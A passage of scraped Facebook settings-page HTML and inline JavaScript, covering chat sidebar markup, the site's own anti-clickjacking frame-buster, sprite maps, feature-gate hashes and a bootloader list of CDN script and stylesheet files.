</div> <div class="_3gl7"> <div class="_46fv"> <a aria-label="Create new group" class="_1-4-" data-hover="tooltip" data-tooltip-content="Create new group" data-tooltip-position="below" href="https://www.facebook.com/settings?tab=security&amp;section=password&amp;view#"> </a> </div> </div> </div> <div class="titlebarLabel clearfix"> <div class="titlebarTextWrapper"> Chat </div> </div> </div> <div class="_2v5j"> <div class="fbNubFlyoutBody" data-jsid="scrollingArea" id="u_0_18" style="min-height: 285px;"> <div class="fbNubFlyoutBodyContent"> <div class="uiScrollableArea scrollableOrderedList fade" id="u_0_19" style="width:274px;"> <div aria-label="Scrollable region" class="uiScrollableAreaWrap" id="u_0_1a" role="group" tabindex="0"> <div class="uiScrollableAreaBody" style="width:274px;"> <div class="uiScrollableAreaContent"> <div id="u_0_1b"> <div class="fbChatOrderedList clearfix"> </div> </div> </div> </div> </div> <div class="uiScrollableAreaTrack invisible_elem"> <div class="uiScrollableAreaGripper hidden_elem"> </div> </div> </div> </div> </div> </div> <div class="fbNubFlyoutFooter"> <div class="fbChatTypeahead flipped" id="u_0_1c"> <div> <div id="chatsidebarsheet"> </div> <div> <div class="_1nq2"> <div class="_5iwm _5iwn _62it"> <label class="_58ak _3rhb"> <input class="_58al" placeholder="Search" type="text"/> </label> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="_2xwp"> <div id="u_0_1n"> <ul class="hidden_elem _50d1" data-gt='{"ref":"beeper","jewel":"notifications","type":"click2canvas","fbsource":"1001"}' data-testid="beeper_list"> </ul> </div> <div id="sticky-upload-hook"> </div> </div> </div> </div> <div> </div> <script type="text/javascript"> /*<![CDATA[*/(function(){function si_cj(m){setTimeout(function(){new Image().src="https:\\/\\/error.facebook.com\\/common\\/scribe_endpoint.php?c=si_clickjacking&t=36"+"&m="+m;},5000);}if(top!=self && !false){try{if(parent!=top){throw 1;}var si_cj_d=["apps.facebook.com","apps.beta.facebook.com"];var href=top.location.href.toLowerCase();for(var i=0;i<si_cj_d.length;i++){if (href.indexOf(si_cj_d[i])>=0){throw 1;}}si_cj("3 https:\\/\\/www.facebook.com\\/settings\\/security\\/");}catch(e){si_cj("1 \\thttps:\\/\\/www.facebook.com\\/settings\\/security\\/");window.document.write("\\u003Cstyle>body * {display:none !important;}\\u003C\\/style>\\u003Ca href=\\"#\\" onclick=\\"top.location.href=window.location.href\\" style=\\"display:block !important;padding:10px\\">Go to Facebook.com\\u003C\\/a>");/*MDtJbJaX*/}}}())/*]]>*/ </script> <script> requireLazy(["ix"], function(ix) {ix.add({"123800":{"sprited":true,"spriteCssClass":"sx_ba6dc7","spriteMapCssClass":"sp_fALpUwt6A2b"},"123895":{"sprited":true,"spriteCssClass":"sx_d6fb24","spriteMapCssClass":"sp_fALpUwt6A2b"},"123970":{"sprited":true,"spriteCssClass":"sx_c5be79","spriteMapCssClass":"sp_fALpUwt6A2b"},"124030":{"sprited":true,"spriteCssClass":"sx_e5b12f","spriteMapCssClass":"sp_fALpUwt6A2b"},"124446":{"sprited":true,"spriteCssClass":"sx_1da433","spriteMapCssClass":"sp_fALpUwt6A2b"},"124579":{"sprited":true,"spriteCssClass":"sx_c2f462","spriteMapCssClass":"sp_fALpUwt6A2b"},"124753":{"sprited":true,"spriteCssClass":"sx_092bbb","spriteMapCssClass":"sp_fALpUwt6A2b"},"124826":{"sprited":true,"spriteCssClass":"sx_4a15a5","spriteMapCssClass":"sp_fALpUwt6A2b"},"124873":{"sprited":true,"spriteCssClass":"sx_7543af","spriteMapCssClass":"sp_fALpUwt6A2b"},"125066":{"sprited":true,"spriteCssClass":"sx_5a5d65","spriteMapCssClass":"sp_fALpUwt6A2b"},"125168":{"sprited":true,"spriteCssClass":"sx_1a670d","spriteMapCssClass":"sp_fALpUwt6A2b"},"125305":{"sprited":true,"spriteCssClass":"sx_d4e2c0","spriteMapCssClass":"sp_Vwm17iA5muE"},"125317":{"sprited":true,"spriteCssClass":"sx_1ae770","spriteMapCssClass":"sp_fALpUwt6A2b"},"127041":{"sprited":true,"spriteCssClass":"sx_ee2fae","spriteMapCssClass":"sp_fALpUwt6A2b"},"127061":{"sprited":true,"spriteCssClass":"sx_c9da24","spriteMapCssClass":"sp_fALpUwt6A2b"},"127648":{"sprited":true,"spriteCssClass":"sx_189ee3","spriteMapCssClass":"sp_fALpUwt6A2b"},"128169":{"sprited":true,"spriteCssClass":"sx_e8de8a","spriteMapCssClass":"sp_fALpUwt6A2b"},"76304":{"sprited":true,"spriteCssClass":"sx_e4dc60","spriteMapCssClass":"sp_OaNSB-iXOX1"},"92724":{"sprited":true,"spriteCssClass":"sx_9503b6","spriteMapCssClass":"sp_OaNSB-iXOX1"},"277478":{"sprited":true,"spriteCssClass":"sx_57c2cc","spriteMapCssClass":"sp_OaNSB-iXOX1"},"287648":{"sprited":true,"spriteCssClass":"sx_990d9e","spriteMapCssClass":"sp_OaNSB-iXOX1"},"351290":{"sprited":true,"spriteCssClass":"sx_50e0c0","spriteMapCssClass":"sp_OaNSB-iXOX1"},"355144":{"sprited":true,"spriteCssClass":"sx_3beeed","spriteMapCssClass":"sp_OaNSB-iXOX1"},"363137":{"sprited":true,"spriteCssClass":"sx_b8fee0","spriteMapCssClass":"sp_OaNSB-iXOX1"},"26967":{"sprited":true,"spriteCssClass":"sx_f9607c","spriteMapCssClass":"sp_8hWF1fuTs1A"},"40052":{"sprited":true,"spriteCssClass":"sx_62a652","spriteMapCssClass":"sp_fM-mz8spZ1b"},"81849":{"sprited":true,"spriteCssClass":"sx_095b1b","spriteMapCssClass":"sp_-ldAr6eGODF"},"82423":{"sprited":true,"spriteCssClass":"sx_b40923","spriteMapCssClass":"sp_Q_SFgtofUXE"},"86988":{"sprited":true,"spriteCssClass":"sx_a0676a","spriteMapCssClass":"sp_asItN2bUNa0"},"87068":{"sprited":true,"spriteCssClass":"sx_b05d4c","spriteMapCssClass":"sp_-ldAr6eGODF"},"94348":{"sprited":true,"spriteCssClass":"sx_4400e3","spriteMapCssClass":"sp_-ldAr6eGODF"},"94375":{"sprited":true,"spriteCssClass":"sx_6ad88e","spriteMapCssClass":"sp_lYVI4YsMHFn"},"94376":{"sprited":true,"spriteCssClass":"sx_df021b","spriteMapCssClass":"sp_lYVI4YsMHFn"},"95501":{"sprited":true,"spriteCssClass":"sx_43ac56","spriteMapCssClass":"sp_8hWF1fuTs1A"},"95502":{"sprited":true,"spriteCssClass":"sx_2afad7","spriteMapCssClass":"sp_8hWF1fuTs1A"},"95512":{"sprited":true,"spriteCssClass":"sx_aa637d","spriteMapCssClass":"sp_8hWF1fuTs1A"},"95513":{"sprited":true,"spriteCssClass":"sx_58bd5d","spriteMapCssClass":"sp_8hWF1fuTs1A"},"95518":{"sprited":true,"spriteCssClass":"sx_162a28","spriteMapCssClass":"sp_8hWF1fuTs1A"},"95519":{"sprited":true,"spriteCssClass":"sx_ea127f","spriteMapCssClass":"sp_8hWF1fuTs1A"},"95521":{"sprited":true,"spriteCssClass":"sx_233692","spriteMapCssClass":"sp_8hWF1fuTs1A"},"95522":{"sprited":true,"spriteCssClass":"sx_3486fa","spriteMapCssClass":"sp_8hWF1fuTs1A"},"95526":{"sprited":true,"spriteCssClass":"sx_2952b3","spriteMapCssClass":"sp_Q1QbTAs7cDG"},"95528":{"sprited":true,"spriteCssClass":"sx_93301e","spriteMapCssClass":"sp_Q1QbTAs7cDG"},"95529":{"sprited":true,"spriteCssClass":"sx_fd3c83","spriteMapCssClass":"sp_Q1QbTAs7cDG"},"95530":{"sprited":true,"spriteCssClass":"sx_05b7b0","spriteMapCssClass":"sp_Q1QbTAs7cDG"},"95531":{"sprited":true,"spriteCssClass":"sx_c26de8","spriteMapCssClass":"sp_Q1QbTAs7cDG"},"95532":{"sprited":true,"spriteCssClass":"sx_44669e","spriteMapCssClass":"sp_Q1QbTAs7cDG"},"95533":{"sprited":true,"spriteCssClass":"sx_765898","spriteMapCssClass":"sp_Q1QbTAs7cDG"},"95537":{"sprited":true,"spriteCssClass":"sx_0fe3f9","spriteMapCssClass":"sp_8hWF1fuTs1A"},"95538":{"sprited":true,"spriteCssClass":"sx_ce4d03","spriteMapCssClass":"sp_8hWF1fuTs1A"},"122203":{"sprited":true,"spriteCssClass":"sx_15a274","spriteMapCssClass":"sp_-ldAr6eGODF"},"122574":{"sprited":true,"spriteCssClass":"sx_cfa748","spriteMapCssClass":"sp_-ldAr6eGODF"},"123107":{"sprited":true,"spriteCssClass":"sx_e9e68c","spriteMapCssClass":"sp_Q1QbTAs7cDG"},"123137":{"sprited":true,"spriteCssClass":"sx_9b6c5f","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"123230":{"sprited":true,"spriteCssClass":"sx_3803c3","spriteMapCssClass":"sp_Q1QbTAs7cDG"},"123502":{"sprited":true,"spriteCssClass":"sx_363418","spriteMapCssClass":"sp_Q1QbTAs7cDG"},"404223":{"sprited":true,"spriteCssClass":"sx_a26185","spriteMapCssClass":"sp_-ldAr6eGODF"},"478326":{"sprited":true,"spriteCssClass":"sx_d28f7a","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"504082":{"sprited":true,"spriteCssClass":"sx_405999","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"505225":{"sprited":true,"spriteCssClass":"sx_6b769b","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"571080":{"sprited":true,"spriteCssClass":"sx_7cb38a","spriteMapCssClass":"sp_Q1QbTAs7cDG"},"458300":{"sprited":false,"uri":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/ys\\/r\\/38L0gJ1YxEi.png","width":16,"height":16}});}); requireLazy(["gkx"], function(gkx) {gkx.add({"AT5huHG2ZwhQRG4wsq3SGMN3nvTL0cl6WnMDmJ4szQP1y0o6thXp_6CfXUwNbqgDFgYrK5iR2HDgMq3_mzv-_V8b":{"result":true,"hash":"AT6R9J2TW8zxPIcH"},"AT6Q2x7gNg7Gis3g_Acxq5QKW2uVkTcYAELBQCGsE3TGJOtPLz-mx51ETR-YD6ugDTtNRWwZZrCB6V07w1aU__FR":{"result":false,"hash":"AT6qNrdBdwqh2oCQ"},"AT6CUBYr_9N_CSXV6k-KrXQLKNDSPuibvI1F3ys7r1YWSdBoHIWjerwcV9NawiMLVuituTCqs9yoiqPJZAjB0JRa":{"result":false,"hash":"AT7sdVaVGQGCBDss"},"AT4YdlZV4JJTtJC077vmEmLVdJyWr6In834BSTh3uurhOmYMskwzQQVmbWvdp5iY7qOrPqjTDGZiEP6G4qFURsi-":{"result":true,"hash":"AT7uZAIMYeBA8sHD"},"AT7qvBGeY3qi4kzGsfSdDBRKoyiGhUCE2HY_OLm4gW_hIR5XTy870z-6Bh0Vp_U80-c":{"result":false,"hash":"AT4o6kfzwkGWiYyo"},"AT5AGDWr7VWKZPg1PvTz69G07vIW7nWrxrA4PloGCgjyPuof8r7WUUsWLIKzWOZMmcJyN6U1BeEUXZmBqPUEAKAe":{"result":false,"hash":"AT57381Jbu5bEqC2"},"AT4vZBWyiZL1KZrir2lJt4vVNMIYu8sDbA3PtNwJWZh5seJSYZeYdmCgqH3wgiUS4PfslnEPm3wz9jSsjDINBCSy":{"result":false,"hash":"AT6v9Cv2drIJjZd3"},"AT7ffoM8gf91Fer7cUMkwGH62Vum20vkKo_AIqUOx27bu9y21PoFYcSzgDJj_KAeh5RgHmHKzv6c5n2RlIxDAfXE":{"result":true,"hash":"AT7ucJUtW9fN74nk"},"AT5MAotH6BG7mXo4DyZnW3seA7_jf32c8tGX1llmkbXJ5ui_oKs0jpz-iYum9Gkv1o7pv5ZMvW9WlaNx_vA1ZSmAhi0Rjb62jJA5vu2Oz81AxQ":{"result":true,"hash":"AT4k14bQYgM-rtzT"},"AT6272W7G37c2zZOpPDUPGXaehXUPvo7_ZqAqdSAoKzgP5DQ8Luz0w5hQkLZeaPa8UmuuAXTSUI8FctXnbHnbKTw":{"result":true,"hash":"AT4L2xaGYZhtza7G"},"AT416ehE3mw1ywphqzeoc8-sSvcWOXWjwXQ3ibWkBpwpByhwGjdm9WHBt1oIZ43TE4bKo4d3LF402n5EQceIgzie":{"result":false,"hash":"AT7tnQHcHa_IUSZJ"},"AT4L8DlAE0WEKOKYkeJWzHDsRi3-ZWFYr4agMbkLtMUBERlxiBLblqdrc15ka2y0CqeZkLHc9yfq9QS1H3akL6e9":{"result":false,"hash":"AT4Dzj5xUjZhqv2B"},"AT4grcDiscEresqqeClxpO237YZ45cFruyvJopDLWV5VxCEacOqalxUvxpeiizJZHxd73ijS9yBBVXZDNpL60jLW":{"result":true,"hash":"AT4V3iQiBojL3gaQ"},"AT7KSMdBbHFSBSJn1JWZUBa76yZr8D9pobYWWvzliNi0RZQsDI29awNxAAPfpbtiIQHouKzRc3uiaxxHhFXpGQGFiE6SMOOJwNKziF0lagOtKg":{"result":false,"hash":"AT4UWlsxBMkbvLqn"},"AT6h5--3KUdxbat1rL4n2mVcPcg9eZ8bwokXjpPZS-_sSShoFlPyHXdioNqIwODAz2vH7270MK0r4x8XFkaYt6-h":{"result":false,"hash":"AT5J8F6oFzeoBYbh"},"AT5Q5FCBY57gPdOe4Xo96r5zTgZZh87GRY--ncB3hM3Ra_B90Pc8SDhcEc8FXtQOATf6BwBTiNdA_hZCDlaZ5sW0DhwFxWZa8AHAo9f71cU_8w":{"result":true,"hash":"AT5MFzQIdrnFhOKK"},"AT6Entg5fgPoxEgjAuS5mhrDOsXuhY4Od6KMBgyuGQilj9xhRwdYBeSq1poeS8BUVnje5hK8N92CXf1vnWuEk8Ad":{"result":false,"hash":"AT4zRKJDkEF5B7iB"},"AT505jRFtG_7w3nhZICN2g5HZo5KZ4FP0G7n7x_oCDMvQmeZOfjSNcbXcUzDHS_pr0yjnx5p-38r7Z_8WJZNypI6":{"result":false,"hash":"AT5IcGkpXNJnwAIy"},"AT6L2kuIBRuWW0PexN6vDPwG8jXq7P33rctbcFnbtPNaMRMDiIPuY9YWP6BxpjivumzahLoHEGg-neyMHU_Sbe4y":{"result":false,"hash":"AT7G4D3n4HKTwfuz"},"AT6C9eFRZzv5aBnUbaPl8EMWoqk-0PCoHr4DzPcUAeGCIPHwjkC5o9BVL5F3ssfwh4ZkvikNKfodzFNR-DeT2dYAgSi3Qtu4mOiYCkgV3jT-dQ":{"result":true,"hash":"AT7PcKSG0krea_k2"},"AT7IUpMNCDwRhHRxDzBLrJpPbYE8uTJ1DeVPi7kI4P6d1kkPlaoUvVQ4PD7tRb3ytv8Qfy0k-XTjn2GSfPmPRWCn":{"result":true,"hash":"AT6_afJFgZvj3qni"},"AT7sD1fF_8x-4xxzoAaekZya5eGXuWSo92U8w8HKbhIVLROxV_1CMyGef1ykTzXLVcx0oP_derMD1dJXZ3xN3GMMFtqM6UPFfCa4s0vXN1q3cw":{"result":false,"hash":"AT4vtuFCQ3zGRxOu"},"AT4VU3LTU_m0y3MeJeai7hJytsOcRy63JbTrv7QtkGDcMH9aN_sV8sDNC1ebrhVq0RfT0H4FEgW5UVoJHsOiHpnF":{"result":true,"hash":"AT50x3VdRVM1Haxx"},"AT50rCMLjvDuatTW5TsjM2u6gMWTVPS9VYcThoF2YseuEx5BnXFifqzV9ujJx6WrSeL73zTcF-UBjMJwgSqFUVpE":{"result":false,"hash":"AT4UhfFVbhUXBWiL"},"AT5xYWX1HaHq0mlJu0NkRf_e_OmmY9OGoSVcBlIQl6PZXpIkjcWrL_-WeMeb2wlme9kydzLC-IWl5vk8RtPZY0AH":{"result":false,"hash":"AT6UgOQrmMBSC6jH"},"AT6pJYs0q99bK9Yq7MDb3tKyZ64i8MXk0Z6EotFquJmnMvuS-gjnS6AGE_ZLGP0z1bW87h1Gq_qL532Iux29rXVM":{"result":false,"hash":"AT57riNk936uUwYI"},"AT5MBMFcixHBDTVOnCOPABoY0SEKBgkMs8hdbXp10jt9exDuCkED-SN_LCnMzGSUGwNE5GSruaV2scvSC7UQy-lM":{"result":false,"hash":"AT7uJ3RBaUTjxuh0"},"AT7tvAuAV_g6puo48Jr3rJqUtJbiLAulr3mm_Iqiyhky1tvFklMRTm84CFvshg4Yjh0vsxAXYBZkM_ZMvt8NGRwa":{"result":false,"hash":"AT4e_IshBIR_AyWX"},"AT6Afdq0Tt2jEesGOMGnSRKoZIl2eQfQBS7ISXiYFG3RHN4ykkPiZeyWuKALtD0ObEVGeeZuAFKdYpfxlBzUUPkd":{"result":false,"hash":"AT6tQbmUdKHdRI6W"}});});requireLazy(["Bootloader"], function(Bootloader) {Bootloader.setResourceMap({"+ClWy":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/y7\\/r\\/0xhx3obSVLq.js","crossOrigin":1},"8ELCB":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/ye\\/r\\/4c56_sYLseJ.js","crossOrigin":1},"2J3W3":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iCVi4\\/y7\\/l\\/en_GB\\/2XnxFe-9EvX.js","crossOrigin":1},"oE4Do":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/y1\\/r\\/sRsvuVeGcyN.js","crossOrigin":1},"8p081":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/y2\\/r\\/dsa7CzFnF_1.js","crossOrigin":1},"Adbbx":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yt\\/r\\/xFvpS6yMnIz.js","crossOrigin":1},"L4sg3":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iQ1q4\\/yV\\/l\\/en_GB\\/6j0VuY8JRAu.js","crossOrigin":1},"hv63h":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3ihKy4\\/yA\\/l\\/en_GB\\/4IzGXbIsLVx.js","crossOrigin":1},"TJscQ":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/y-\\/r\\/JlTUDDLZPVS.js","crossOrigin":1},"vjHYq":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yN\\/r\\/9BIkSGz2P9D.js","crossOrigin":1},"2dbAx":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iCJV4\\/yb\\/l\\/en_GB\\/qQzzZQ9QCfx.js","crossOrigin":1},"wsPMx":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yc\\/r\\/xYTiYXN51gv.js","crossOrigin":1},"SBUoZ":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iU4h4\\/y-\\/l\\/en_GB\\/Z9Hwjl16PVh.js","crossOrigin":1},"t4eYq":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3ivcC4\\/yQ\\/l\\/en_GB\\/EgTG4_Zu8eg.js","crossOrigin":1},"GKoFq":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3izaH4\\/ya\\/l\\/en_GB\\/bkooa4U91Cu.js","crossOrigin":1},"8\\/Gp3":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3ine84\\/yq\\/l\\/en_GB\\/AuANspNxt3a.js","crossOrigin":1},"uSKfe":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3ie184\\/yg\\/l\\/en_GB\\/ffgEtNuzH-o.js","crossOrigin":1},"iLoE\\/":{"type":"css","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/y2\\/l\\/0,cross\\/R1lQDR3nFn_.css","permanent":1,"crossOrigin":1},"kvzVs":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3itiF4\\/yR\\/l\\/en_GB\\/OG5recA7H1o.js","crossOrigin":1},"NU36+":{"type":"css","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yo\\/l\\/0,cross\\/S-bc5kHo_EJ.css","permanent":1,"crossOrigin":1},"48do+":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/ys\\/r\\/Ch-IQ4IPjR4.js","crossOrigin":1},"saB+d":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3i3sq4\\/yD\\/l\\/en_GB\\/odQVW9Wjngg.js","crossOrigin":1},"NL5X7":{"type":"css","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yo\\/l\\/0,cross\\/Mk2QTmuqh7_.css","permanent":1,"crossOrigin":1},"+FAAM":{"type":"css","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yh\\/l\\/0,cross\\/gGKzhbQUOf9.css","permanent":1,"crossOrigin":1},"8653B":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3ivrt4\\/yE\\/l\\/en_GB\\/EIAkilVhel1.js","crossOrigin":1},"0k9b3":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iH5q4\\/y-\\/l\\/en_GB\\/D8bQqmSlqkO.js","crossOrigin":1},"ik8Yv":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3i-s_4\\/y9\\/l\\/en_GB\\/czFJWi0q9ws.js","crossOrigin":1},"e3rlC":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iRAg4\\/yh\\/l\\/en_GB\\/l1MFyGfBaMA.js","crossOrigin":1},"+pd15":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3i7qE4\\/yW\\/l\\/en_GB\\/nJNU64Wx7f9.js","crossOrigin":1},"0Klmq":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yK\\/r\\/gPnaPO8aFmM.js","crossOrigin":1},"aPbBQ":{"type":"css","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/y2\\/l\\/0,cross\\/RdWPWcV6jHN.css","crossOrigin":1},"Xp5SU":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iPCC4\\/yc\\/l\\/en_GB\\/zs7nVC8PlM1.js","crossOrigin":1},"JqNua":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iBF04\\/yE\\/l\\/en_GB\\/ocG_p9iP4FI.js","crossOrigin":1},"Av0f1":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3ikY14\\/yA\\/l\\/en_GB\\/LZrWtc8Ca8V.js","crossOrigin":1},"eqNxI":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3itGy4\\/yb\\/l\\/en_GB\\/SvrdI1aJQbu.js","crossOrigin":1},"KKFSn":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yj\\/r\\/GkkNvSTmpsu.js","crossOrigin":1},"FolRP":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yH\\/r\\/cHaloIleOxq.js","crossOrigin":1},"oChBF":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3ig1X4\\/y-\\/l\\/en_GB\\/cGDX5l5sG5j.js","crossOrigin":1},"p6lvQ":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yM\\/r\\/c2jV0tZ-UsS.js","crossOrigin":1},"brxni":{"type":"css","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yf\\/l\\/0,cross\\/fWw5xjNRMS6.css","permanent":1,"crossOrigin":1},"7krDk":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yj\\/r\\/1q7-t9f3S3N.js","crossOrigin":1},"pdkNp":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/y0\\/r\\/o0okxMExuBa.js","crossOrigin":1},"oOx9y":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iKYw4\\/yW\\/l\\/en_GB\\/P3lUHUBfFJ4.js","crossOrigin":1}});if (true) {Bootloader.enableBootload({"XUIButton.react":{"resources":["Bee0v","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"XUIDialogButton.react":{"resources":["\\/NvwD","Bee0v","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"SimpleXUIDialog":{"resources":["\\/NvwD","Bee0v","IO8eo","q+9No","jAeyQ","sQ7ef"],"needsAsync":1,"module":1},"AsyncDOM":{"resources":["d25Q1","Bee0v","IO8eo"],"needsAsync":1,"module":1},"Dialog":{"resources":["Bee0v","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"ExceptionDialog":{"resources":["DPlsB","P5aPI","\\/NvwD","Bee0v","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"QuickSandSolver":{"resources":["+ClWy","8ELCB","Bee0v","2J3W3","IO8eo"],"needsAsync":1,"module":1},"ConfirmationDialog":{"resources":["Bee0v","IO8eo","oE4Do"],"needsAsync":1,"module":1},"React":{"resources":["IO8eo"],"needsAsync":1,"module":1},"XUIDialogBody.react":{"resources":["\\/NvwD","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"XUIDialogFooter.react":{"resources":["\\/NvwD","Bee0v","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"XUIDialogTitle.react":{"resources":["\\/NvwD","Bee0v","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"XUIGrayText.react":{"resources":["\\/NvwD","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"Animation":{"resources":["Bee0v","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"PageTransitions":{"resources":["np5Vl","Bee0v","rdSEf","IO8eo","zpNP2","MbCGD"],"needsAsync":1,"module":1},"DialogX":{"resources":["Bee0v","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"KeyEventTypedLogger":{"resources":["8p081","IO8eo"],"needsAsync":1,"module":1},"Event":{"resources":["Bee0v"],"needsAsync":1,"module":1},"RequestsJewel":{"resources":["TJscQ","vjHYq","\\/NvwD","Bee0v","rdSEf","IO8eo","zpNP2","2dbAx","jAeyQ","sQ7ef","wsPMx"],"needsAsync":1,"module":1},"HelpLiteFlyoutBootloader":{"resources":["IO8eo","MbCGD"],"needsAsync":1,"module":1},"NotificationJewelController":{"resources":["SBUoZ","t4eYq","GKoFq","vjHYq","8\\/Gp3","np5Vl","uSKfe","Bee0v","dIFKP","IO8eo","q+9No","5p2rH","onpAC","hv63h","MbCGD","87rxF"],"needsAsync":1,"module":1},"MercuryJewel":{"resources":["iLoE\\/","n3CYQ","kvzVs","BEw9R","NU36+","48do+","saB+d","NL5X7","ASgw6","XZrv9","+FAAM","8653B","\\/NvwD","0k9b3","Bee0v","rdSEf","0n0v6","27fPb","ik8Yv","IO8eo","j4Op8","e3rlC","rzQjB","zpNP2","q+9No","+pd15","Pfi8i","0Klmq","onpAC","AYvAm","aPbBQ","jAeyQ","Xp5SU","JqNua","Av0f1","IEK7S","Bf4nG","sQ7ef"],"needsAsync":1,"module":1},"MessengerGCFJewelNewGroupButtonInit":{"resources":["eqNxI","Bee0v","IO8eo","KKFSn"],"needsAsync":1,"module":1},"ReactDOM":{"resources":["Bee0v","IO8eo"],"needsAsync":1,"module":1},"ContextualLayerInlineTabOrder":{"resources":["FolRP","XZrv9","Bee0v","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"CSSFade":{"resources":["Bee0v","IO8eo","sQ7ef"],"needsAsync":1,"module":1},"SortableSideNav":{"resources":["oChBF","Bee0v","p6lvQ","IO8eo","zpNP2","cVyaN"],"needsAsync":1,"module":1},"EncryptedImg":{"resources":["dIFKP","IO8eo"],"needsAsync":1,"module":1},"NotificationSeenState":{"resources":["vjHYq","Bee0v","IO8eo","hv63h"],"needsAsync":1,"module":1},"NotificationStore":{"resources":["SBUoZ","GKoFq","vjHYq","np5Vl","uSKfe","Bee0v","dIFKP","IO8eo","q+9No","5p2rH","hv63h","MbCGD","87rxF"],"needsAsync":1,"module":1},"NotificationUpdates":{"resources":["vjHYq","Bee0v","IO8eo"],"needsAsync":1,"module":1},"NotificationJewelList.react":{"resources":["SBUoZ","iLoE\\/","BEw9R","vjHYq","8\\/Gp3","np5Vl","\\/NvwD","AMXo2","Bee0v","rdSEf","brxni","dIFKP","IO8eo","rzQjB","zpNP2","q+9No","2dbAx","7krDk","Pfi8i","onpAC","hv63h","MbCGD","jAeyQ","sQ7ef"],"needsAsync":1,"module":1},"NotificationList.react":{"resources":["SBUoZ","GKoFq","vjHYq","np5Vl","uSKfe","Bee0v","dIFKP","IO8eo","rzQjB","q+9No","5p2rH","7krDk","onpAC","hv63h","MbCGD","87rxF"],"needsAsync":1,"module":1},"NotificationAsyncWrapper":{"resources":["8\\/Gp3","IO8eo"],"needsAsync":1,"module":1},"QPLInspector":{"resources":["pdkNp"],"needsAsync":1,"module":1},"HelpLiteFlyout":{"resources":["nvklr","Bee0v","IO8eo","MbCGD","sQ7ef"],"needsAsync":1,"module":1},"FantaTabActions":{"resources":["BEw9R","Bee0v","IO8eo","rzQjB","zpNP2","q+9No"],"needsAsync":1,"module":1},"WebNotificationsPresenter":{"resources":["vjHYq","Bee0v","oOx9y","IO8eo","jAeyQ"],"needsAsync":1,"module":1},"RTISubscriptionManager":{"resources":["Bee0v","IO8e